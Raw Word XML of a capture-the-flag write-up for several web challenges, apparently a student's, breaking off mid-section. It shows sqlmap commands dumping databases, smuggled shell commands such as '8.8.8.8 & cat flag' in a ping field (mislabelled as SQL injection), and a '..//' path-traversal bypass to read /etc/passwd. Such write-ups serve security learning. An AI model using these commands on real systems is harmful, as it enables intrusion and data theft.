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C56A6" w14:textId="3E705DEF" w:rsidR="00303479" w:rsidRDefault="00C602BC" w:rsidP="00303479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Small data leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716E9F2A" w14:textId="3C1C95FF" w:rsidR="00303479" w:rsidRPr="00303479" w:rsidRDefault="00303479" w:rsidP="00303479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>When opening the page, we see registration with two inputs, one of which is not validated, which gives us the doubt that possible sql injection attack can be done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08676900" w14:textId="6C27077D" w:rsidR="00C602BC" w:rsidRDefault="00C602BC" w:rsidP="00986175">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>In the url we wrote /user?id=</w:t>
      </w:r>
      <w:r w:rsidR="00986175">
        <w:t xml:space="preserve"> and b</w:t>
      </w:r>
      <w:r w:rsidR="00986175" w:rsidRPr="00986175">
        <w:t xml:space="preserve">ased on the error </w:t>
      </w:r>
      <w:r w:rsidR="00303479">
        <w:t>below</w:t>
      </w:r>
      <w:r w:rsidR="00986175" w:rsidRPr="00986175">
        <w:t>, it was concluded that SQLAlchemy is a python library used for</w:t>
      </w:r>
      <w:r w:rsidR="00986175">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00986175" w:rsidRPr="00986175">
        <w:t>interacting with SQL databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B034BC0" w14:textId="6DAFC2B4" w:rsidR="00986175" w:rsidRPr="00C602BC" w:rsidRDefault="00986175" w:rsidP="00986175">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r w:rsidRPr="00986175">
        <w:t>Since the SQL vulnerability seems pretty basic, we will use SQLmap to obtain the injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00986175">
        <w:t>point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7224DF7E" w14:textId="2FB32E1B" w:rsidR="00C602BC" w:rsidRDefault="00C602BC" w:rsidP="00C602BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ABFCDD1" wp14:editId="7B0AFD8E">
            <wp:extent cx="5943600" cy="32391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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3239135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CBB2F6" w14:textId="28266A03" w:rsidR="00303479" w:rsidRDefault="00303479" w:rsidP="00303479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>Since /user?id= isn’t working, I will scan exactly that with the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1DC728" w14:textId="35B1D4DA" w:rsidR="00303479" w:rsidRDefault="00303479" w:rsidP="00303479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap -u ‘http://34/107/45/207:30681/user?id=1’ --random-agent --time-sec=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DC5BEA" w14:textId="1C4F3A5F" w:rsidR="00303479" w:rsidRDefault="00303479" w:rsidP="00303479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30B7A9F4" wp14:editId="07D1F3E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5A68899" w14:textId="10D35AF5" w:rsidR="00303479" w:rsidRDefault="00303479" w:rsidP="00303479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175528C5" wp14:editId="3C0FBE3C">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8AF29C1" w14:textId="175899C3" w:rsidR="00303479" w:rsidRDefault="00303479" w:rsidP="00303479">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From these two screenshots, we get that the site is </w:t>
      </w:r>
      <w:r w:rsidR="00D51EED">
        <w:t>not protected from sql injection. Therefore, I will try to fetch existing database names from the server with the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA090C" w14:textId="378F74F2" w:rsidR="00D51EED" w:rsidRDefault="00D51EED" w:rsidP="00D51EED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap -u ‘http://34/107/45/207:30681/user?id=1’ --random-agent --time-sec=2 -dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47BE47" w14:textId="72558234" w:rsidR="00D51EED" w:rsidRDefault="00D51EED" w:rsidP="00D51EED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5570FFEC" wp14:editId="2B141F0E">
            <wp:extent cx="5943600" cy="3343275"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE415CD" w14:textId="17FB918D" w:rsidR="00D51EED" w:rsidRDefault="00D51EED" w:rsidP="00D51EED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>We see in this screenshot that there are 3 databases, I will open all of them and check what is going on there with the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A75D66" w14:textId="40697BD6" w:rsidR="00D51EED" w:rsidRDefault="00D51EED" w:rsidP="00D51EED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap -u ‘http://34/107/45/207:30681/user?id=1’ --random-agent --time-sec=2 -D public --tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399298D3" w14:textId="34C7A35D" w:rsidR="00D51EED" w:rsidRDefault="006E2874" w:rsidP="00D51EED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D306D7" wp14:editId="090FFF4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99E47CF" w14:textId="233BD088" w:rsidR="006E2874" w:rsidRDefault="006E2874" w:rsidP="00D51EED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>We see here 3 tables one of which has the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857B86D" w14:textId="77777777" w:rsidR="00845159" w:rsidRDefault="00845159" w:rsidP="00D51EED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343AB05D" w14:textId="77777777" w:rsidR="00845159" w:rsidRDefault="00845159" w:rsidP="00D51EED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2F62B7" w14:textId="4AAF4C22" w:rsidR="00D848F3" w:rsidRPr="00845159" w:rsidRDefault="00845159" w:rsidP="00D848F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ping Station</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB53DA8" w14:textId="22AF6EA7" w:rsidR="00845159" w:rsidRDefault="00845159" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>We see input, where they tell us to input IP and after doing so and inputing IP: 8.8.8.8, it throws us an error:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31195CCD" wp14:editId="2314678C">
            <wp:extent cx="5943299" cy="1292469"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="2100408643" name="Picture 21004086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08643" name="Picture 2100408643" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="79545"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1292534"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A70094E" w14:textId="499B11A1" w:rsidR="00F4459F" w:rsidRDefault="00F4459F" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>When inserting non-valid IP or text info, application has input validation and doesn’t let it through. I will check for sql injection and will try to write with IP sql command, in this case the command, which will give us the content of the folder where this application file is located, command is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A223E" w14:textId="4A4FA56E" w:rsidR="00F4459F" w:rsidRDefault="00F4459F" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>8.8.8.8 &amp; ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C795BF" w14:textId="347BE136" w:rsidR="00F4459F" w:rsidRDefault="00F4459F" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>This will return:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16735518" w14:textId="77521F32" w:rsidR="00F4459F" w:rsidRDefault="00F4459F" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D17ECEE" wp14:editId="47A746C0">
            <wp:extent cx="5943600" cy="1081454"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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11"/>
                    <a:srcRect b="82867"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1081454"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EAF713" w14:textId="0E926C20" w:rsidR="00F4459F" w:rsidRDefault="00F4459F" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>Therefore, application is vulnerable to sql injection</w:t>
      </w:r>
      <w:r w:rsidR="00EC304B">
        <w:t xml:space="preserve"> and one of the folders/directories is flag, I will try to open it by writing command: 8.8.8.8 &amp; cat flag, which will give us the satisfying answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB439F" w14:textId="77777777" w:rsidR="00EC304B" w:rsidRDefault="00EC304B" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF543B8" w14:textId="0839A77E" w:rsidR="00EC304B" w:rsidRDefault="00EC304B" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F183A28" wp14:editId="618A0DA0">
            <wp:extent cx="5943600" cy="791308"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="663407300" name="Picture 6634073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7300" name="Picture 663407300" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="87451"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="791308"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07907714" w14:textId="77777777" w:rsidR="00EC304B" w:rsidRDefault="00EC304B" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4889DC34" w14:textId="77777777" w:rsidR="00EC304B" w:rsidRDefault="00EC304B" w:rsidP="00F4459F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62735E8D" w14:textId="00D7B4AA" w:rsidR="00EC304B" w:rsidRPr="00EC304B" w:rsidRDefault="00EC304B" w:rsidP="00EC304B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>File crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918EE80" w14:textId="756D9A16" w:rsidR="00EC304B" w:rsidRDefault="00EC304B" w:rsidP="00EC304B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>We are lead to a page with the photo, I will try to inspect the source code by pressing inspect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D6A37" w14:textId="0FFD42E5" w:rsidR="00EC304B" w:rsidRDefault="00EC304B" w:rsidP="00EC304B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01FBF83A" wp14:editId="01703287">
            <wp:extent cx="4845539" cy="2725616"/>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4862320" cy="2735055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7467ED80" w14:textId="19CF4008" w:rsidR="00EC304B" w:rsidRDefault="00EC304B" w:rsidP="00EC304B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>From the code, I will copy the address of the image, since it suggests a LFI in the ‘image-name= parameter and will put this url in new tab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04793876" w14:textId="234DFDE8" w:rsidR="00EC304B" w:rsidRDefault="0046472A" w:rsidP="00EC304B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
        <w:rPr>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02126FF9" wp14:editId="3027C027">
            <wp:extent cx="4853354" cy="273001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0535" cy="2734051"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69C5E9" w14:textId="01DFAB41" w:rsidR="0046472A" w:rsidRDefault="0046472A" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>Then I will try a simple payload by writing image_name=../../../etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7746A39A" w14:textId="34D62ABD" w:rsidR="0046472A" w:rsidRDefault="0046472A" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r w:rsidRPr="0046472A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17326210" wp14:editId="746197C3">
            <wp:extent cx="5943600" cy="1069340"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="16510"/>
            <wp:docPr id="160" name="Google Shape;160;p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Google Shape;160;p9" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId15">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1069340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="dk1"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B5247" w14:textId="6F9492D5" w:rsidR="0046472A" w:rsidRDefault="0046472A" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>Since it didn’t work and returned an error message, we need to filter the payload, thus will write: image_name=..//..//..//etc/passwd. Since the filter is almost certainly looking for the entire ‘../’ structure and we are using ‘..//..//’, it bypasses the filter and is still a valid path in linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C4F5B" w14:textId="3CA1F01F" w:rsidR="0046472A" w:rsidRDefault="0046472A" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B859720" wp14:editId="2639D6A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C5E0AB6" w14:textId="6EF3972A" w:rsidR="0046472A" w:rsidRDefault="0046472A" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>Next, we have to find the hidden flag. Looking at the hint from the description, I searched the ‘/tmp’ folder and guessed the file name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6775D746" w14:textId="153268C2" w:rsidR="0046472A" w:rsidRDefault="0046472A" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r w:rsidRPr="0046472A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49E987E2" wp14:editId="1F0EC5CA">
            <wp:extent cx="4533900" cy="351269"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10795"/>
            <wp:docPr id="213" name="Google Shape;213;p13"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="213" name="Google Shape;213;p13"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId17">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect b="14235"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4533900" cy="351269"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="C00000"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7030E4" w14:textId="0D5590C5" w:rsidR="0046472A" w:rsidRDefault="0046472A" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>This will give us a result that we were looking for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DA1451" w14:textId="04436545" w:rsidR="0046472A" w:rsidRDefault="0046472A" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r w:rsidRPr="0046472A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2890BB8B" wp14:editId="0B1FE1F2">
            <wp:extent cx="5943600" cy="652780"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
            <wp:docPr id="214" name="Google Shape;214;p13"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="214" name="Google Shape;214;p13"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId18">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect t="4731"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="652780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="00B050"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BBEFE9" w14:textId="77777777" w:rsidR="003249E9" w:rsidRDefault="003249E9" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCB8CE9" w14:textId="77777777" w:rsidR="003249E9" w:rsidRDefault="003249E9" w:rsidP="0046472A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630917D8" w14:textId="460486DC" w:rsidR="003249E9" w:rsidRPr="003249E9" w:rsidRDefault="003249E9" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ultra Crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10536468" w14:textId="4D145E90" w:rsidR="003249E9" w:rsidRDefault="003249E9" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:t>On the website we have one input, where I should write the url of some other website, for example, youtube.com. After doing so, it gives me an error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43242FA7" w14:textId="63EFC1A5" w:rsidR="003249E9" w:rsidRDefault="003249E9" w:rsidP="003249E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03C257DD" wp14:editId="042A4041">
            <wp:extent cx="5943600" cy="47665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9"/>
                    <a:srcRect b="85630"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
